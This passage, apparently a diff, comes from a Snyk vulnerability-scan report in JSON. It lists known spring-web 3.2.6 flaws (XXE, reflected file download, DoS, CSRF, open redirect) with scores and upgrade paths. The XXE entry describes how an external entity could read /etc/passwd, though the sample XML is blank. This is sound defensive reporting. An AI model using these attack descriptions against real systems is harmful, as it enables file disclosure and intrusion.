"Red Hat", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:33.950462Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:07.572789Z" - } - ], - "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Improper Input Validation. The protections against Reflected File Download attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a `jsessionid` path parameter.\n## Remediation\nUpgrade `org.springframework:spring-web` to version 4.3.29.RELEASE, 5.0.19.RELEASE, 5.1.18.RELEASE, 5.2.9.RELEASE or higher.\n## References\n- [CVE-2015-5211](https://tanzu.vmware.com/security/cve-2015-5211)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2020-5421)\n", - "epssDetails": { - "percentile": "0.95901", - "probability": "0.15300", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-5421" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.springframework:spring-web", - "proprietary": false, - "creationTime": "2020-09-18T14:36:44.859594Z", - "functions_new": [ - { - "version": [ - "[3.2.0.RELEASE,4.3.29.RELEASE)", - "[5.0.0.RELEASE, 5.0.19.RELEASE)", - "[5.1.0.RELEASE, 5.1.18.RELEASE)", - "[5.2.0.RELEASE, 5.2.9.RELEASE)" - ], - "functionId": { - "className": "org.springframework.web.util.WebUtils", - "functionName": "parseMatrixVariables" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-09-18T14:23:55Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": 
"secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-web" - }, - "publicationTime": "2020-09-18T16:17:53Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:07.572789Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@4.3.29.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-web", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-30163", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[3.0.0.RELEASE,3.2.9.RELEASE)", - "[4.0.0.RELEASE,4.0.5.RELEASE)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "3.2.9.RELEASE", - "4.0.5.RELEASE" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.8, - "functions": [ - { - "version": [ - "[3,3.2.8.RELEASE]", - "[4,4.0.4.RELEASE]" - ], - "functionId": { - "filePath": "org/springframework/http/converter/xml/SourceHttpMessageConverter.java", - "className": "SourceHttpMessageConverter", - "functionName": "readDOMSource" - } - }, - { - "version": [ - "[3,3.2.8.RELEASE]", - "[4,4.0.4.RELEASE]" - ], - "functionId": { - "filePath": "org/springframework/http/converter/xml/SourceHttpMessageConverter.java", - "className": "SourceHttpMessageConverter", - "functionName": "readSAXSource" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-web", - "references": [ - { - "url": 
"https://github.com/spring-projects/spring-framework/commit/8e096aeef55287dc829484996c9330cf755891a1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/c6503ebbf7c9e21ff022c58706dbac5417b2b5eb", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/issues/16390", - "title": "GitHub Issue" - }, - { - "url": "http://www.gopivotal.com/security/cve-2014-0225", - "title": "Pivotal Security" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-0225", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:48:48.781285Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:33.267561Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:48.781285Z" - } - ], - "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. This is due to not disabling the resolution of URI references by default in a DTD declaration. 
This occurs only when processing user provided XML documents.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nUpgrade `org.springframework:spring-web` to version 3.2.9.RELEASE, 4.0.5.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/8e096aeef55287dc829484996c9330cf755891a1)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/c6503ebbf7c9e21ff022c58706dbac5417b2b5eb)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/16390)\n- [Pivotal Security](http://www.gopivotal.com/security/cve-2014-0225)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-0225)\n", - "epssDetails": { - "percentile": "0.55630", - "probability": "0.00181", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2014-0225" - ], - "CWE": [ - "CWE-611" - ] - }, - "packageName": "org.springframework:spring-web", - "proprietary": false, - "creationTime": "2016-12-25T16:51:52Z", - "functions_new": [ - { - "version": [ - "[3,3.2.8.RELEASE]", - "[4,4.0.4.RELEASE]" - ], - "functionId": { - "className": "org.springframework.http.converter.xml.SourceHttpMessageConverter", - "functionName": "readDOMSource" - } - }, - { - "version": [ - "[3,3.2.8.RELEASE]", - "[4,4.0.4.RELEASE]" - ], - "functionId": { - "className": "org.springframework.http.converter.xml.SourceHttpMessageConverter", - "functionName": "readSAXSource" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2016-12-25T16:51:52Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - 
"format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-web" - }, - "publicationTime": "2016-12-25T16:51:52Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:48.781285Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@3.2.9.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-web", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-30164", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", - "credit": [ - "Toshiaki Maki" - ], - "semver": { - "vulnerable": [ - "[3.2.0.RELEASE, 3.2.14.RELEASE)", - "[4.0.0.RELEASE, 4.1.7.RELEASE)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "3.2.14.RELEASE", - "4.1.7.RELEASE" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-web", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/5a711c05ec750f069235597173084c2ee796242", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/issues/17727", - "title": "GitHub Issue" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3192", - "title": "NVD" - }, - { - "url": "http://pivotal.io/security/cve-2015-3192", - "title": "Pivotal Security" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 5.5, - "modificationTime": "2024-03-11T09:46:06.799603Z" - } - ], - 
"cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:18.827537Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:06.799603Z" - } - ], - "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). It does not properly process inline DTD declarations when DTD is not entirely disabled, which allows remote attackers to cause a denial of service (memory consumption and out-of-memory errors) via a crafted XML file.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-web` to version 3.2.14.RELEASE, 4.1.7.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/5a711c05ec750f069235597173084c2ee796242)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/17727)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3192)\n- [Pivotal Security](http://pivotal.io/security/cve-2015-3192)\n", - "epssDetails": { - "percentile": "0.91000", - "probability": "0.03030", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-3192" - ], - "CWE": [ - "CWE-119" - ] - }, - "packageName": "org.springframework:spring-web", - "proprietary": false, - "creationTime": "2016-12-25T16:51:55Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2015-10-16T05:57:41Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - 
{ - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-web" - }, - "publicationTime": "2016-12-25T16:51:55Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:06.799603Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@3.2.14.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-web", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-30165", - "title": "Reflected File Download", - "CVSSv3": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", - "credit": [ - "Alvaro Muñoz" - ], - "semver": { - "vulnerable": [ - "[3.2.0.RELEASE, 3.2.15.RELEASE)", - "[4.0.0.RELEASE, 4.1.8.RELEASE)", - "[4.2.0.RELEASE, 4.2.2.RELEASE)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "3.2.15.RELEASE", - "4.1.8.RELEASE", - "4.2.2.RELEASE" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.6, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-web", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/03f547eb9868f48f44d59b56067d4ac4740672c3", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/2bd1daa75ee0b8ec33608ca6ab065ef3e1815543", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/a95c3d820dbc4c3ae752f1b3ee22ee860b162402", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/issues/18124", - "title": "GitHub Issue" - }, - { - "url": 
"https://www.trustwave.com/Resources/SpiderLabs-Blog/Reflected-File-Download---A-New-Web-Attack-Vector/", - "title": "Oren Hafif Blog" - }, - { - "url": "http://pivotal.io/security/cve-2015-5211", - "title": "Pivotal Security" - }, - { - "url": "https://access.redhat.com/security/cve/cve-2015-5211", - "title": "RedHat CVE Database" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", - "cvssV3BaseScore": 9.6, - "modificationTime": "2024-03-11T09:48:48.763614Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:03.857756Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:48.763614Z" - } - ], - "description": "## Overview\n\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\n\nAffected versions of this package are vulnerable to Reflected File Download\nvia a crafted URL with a batch script extension, resulting in the response being downloaded rather than rendered.\n\n## Remediation\n\nUpgrade `org.springframework:spring-web` to version 3.2.15.RELEASE, 4.1.8.RELEASE, 4.2.2.RELEASE or higher.\n\n\n## References\n\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/03f547eb9868f48f44d59b56067d4ac4740672c3)\n\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/2bd1daa75ee0b8ec33608ca6ab065ef3e1815543)\n\n- [GitHub 
Commit](https://github.com/spring-projects/spring-framework/commit/a95c3d820dbc4c3ae752f1b3ee22ee860b162402)\n\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/18124)\n\n- [Oren Hafif Blog](https://www.trustwave.com/Resources/SpiderLabs-Blog/Reflected-File-Download---A-New-Web-Attack-Vector/)\n\n- [Pivotal Security](http://pivotal.io/security/cve-2015-5211)\n\n- [RedHat CVE Database](https://access.redhat.com/security/cve/cve-2015-5211)\n", - "epssDetails": { - "percentile": "0.68512", - "probability": "0.00278", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-5211" - ], - "CWE": [ - "CWE-494" - ] - }, - "packageName": "org.springframework:spring-web", - "proprietary": false, - "creationTime": "2016-12-25T16:51:56Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2015-10-15T16:51:56Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-web" - }, - "publicationTime": "2016-12-25T16:51:56Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:48.763614Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@3.2.15.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-web", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-31331", - "title": "Cross-site Request Forgery (CSRF)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", - "credit": [ - "Spase Markovski" - ], - "semver": { - "vulnerable": [ - 
"[3.0.0.RELEASE,3.2.8.RELEASE)", - "[4.0.0.RELEASE,4.0.2.RELEASE)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "3.2.8.RELEASE", - "4.0.2.RELEASE" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 6.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-web", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/edba32b3093703d5e9ed42b5b8ec23ecc1998398%23diff-1f3f1d5cdab9ac92d1ca5ec7def8f131", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/fb0683c066e74e9667d6cd8c5fa01f674c68c3be%23diff-1f3f1d5cdab9ac92d1ca5ec7def8f131", - "title": "GitHub Commit" - }, - { - "url": "https://jira.spring.io/browse/SPR-11376", - "title": "Jira Issue" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0054", - "title": "NVD" - }, - { - "url": "http://www.pivotal.io/security/cve-2014-0054", - "title": "Pivotal Security" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 6.3, - "modificationTime": "2024-03-11T09:45:48.737689Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 6.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:03:09.210753Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:45:48.737689Z" - } - ], - "description": "## Overview\r\n[`org.springframework:spring-web`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-web%22)\r\nAffected versions of this package do not disable external entity 
resolution, which allows remote attackers to read arbitrary files, cause a denial of service and conduct CSRF attacks via crafted XML, aka an XML External Entity (XXE) issue. \r\n\r\n**NOTE:** this vulnerability exists because of an incomplete fix for [CVE-2013-4152](https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-31330), [CVE-2013-7315](https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-30162), and [CVE-2013-6429](https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-30160).\r\n\r\n## References\r\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0054)", - "epssDetails": { - "percentile": "0.96745", - "probability": "0.25530", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2014-0054" - ], - "CWE": [ - "CWE-352" - ] - }, - "packageName": "org.springframework:spring-web", - "proprietary": false, - "creationTime": "2017-02-22T07:28:31.538000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2014-04-17T14:55:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-web" - }, - "publicationTime": "2014-06-06T21:43:43Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:45:48.737689Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@3.2.8.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-web", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586", - "title": "Open Redirect", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", - 
"credit": [ - "Sean Pesce" - ], - "semver": { - "vulnerable": [ - "[,5.3.32)", - "[6.0.0,6.0.17)", - "[6.1.0,6.1.4)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.3.32", - "6.0.17", - "6.1.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.1, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-web", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/120ea0a51c63171e624ca55dbd7cae627d53a042", - "title": "GitHub Commit" - }, - { - "url": "https://spring.io/security/cve-2024-22243", - "title": "Spring Advisory" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.1, - "cvssVersion": "3.1", - "modificationTime": "2024-07-02T15:25:03.264548Z" - } - ], - "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Open Redirect when `UriComponentsBuilder` parses an externally provided URL, and the application subsequently uses that URL. 
If it contains hierarchical components such as path, query, and fragment it may evade validation.\n## Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.32, 6.0.17, 6.1.4 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/120ea0a51c63171e624ca55dbd7cae627d53a042)\n- [Spring Advisory](https://spring.io/security/cve-2024-22243)\n", - "epssDetails": { - "percentile": "0.09306", - "probability": "0.00043", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2024-22243" - ], - "CWE": [ - "CWE-601", - "CWE-918" - ] - }, - "packageName": "org.springframework:spring-web", - "proprietary": false, - "creationTime": "2024-02-22T09:39:25.202849Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2024-02-21T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-web" - }, - "publicationTime": "2024-02-22T15:48:30.525565Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-07-02T15:25:03.264548Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@5.3.32" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-web", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790", - "title": "Open Redirect", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", - "credit": [ - "threedr3am" - ], - "semver": { - "vulnerable": [ - "[,5.3.33)", - "[6.0.0, 6.0.18)", - "[6.1.0, 6.1.5)" - ] - }, - "exploit": "Not Defined", - 
"fixedIn": [ - "5.3.33", - "6.0.18", - "6.1.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.1, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-web", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/1d2b55e670bcdaa19086f6af9a5cec31dd0390f0", - "title": "GitHub Commit" - }, - { - "url": "https://spring.io/security/cve-2024-22259", - "title": "Spring Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-17T13:32:42.716493Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.1, - "cvssVersion": "3.1", - "modificationTime": "2024-07-02T15:25:03.250566Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-17T13:32:42.716493Z" - } - ], - "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Open Redirect when using `UriComponentsBuilder` to parse an externally provided `URL` and perform validation checks on the host of the parsed URL. 
\r\n\r\n**Note:**\r\nThis is the same as [CVE-2024-22243](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586), but with different input.\n## Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.33, 6.0.18, 6.1.5 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/1d2b55e670bcdaa19086f6af9a5cec31dd0390f0)\n- [Spring Advisory](https://spring.io/security/cve-2024-22259)\n", - "epssDetails": { - "percentile": "0.26310", - "probability": "0.00061", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2024-22259" - ], - "CWE": [ - "CWE-601" - ] - }, - "packageName": "org.springframework:spring-web", - "proprietary": false, - "creationTime": "2024-03-15T10:11:04.950943Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2024-03-14T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-web" - }, - "publicationTime": "2024-03-15T10:42:12.997061Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-07-02T15:25:03.250566Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@5.3.33" - ], - "isUpgradable": 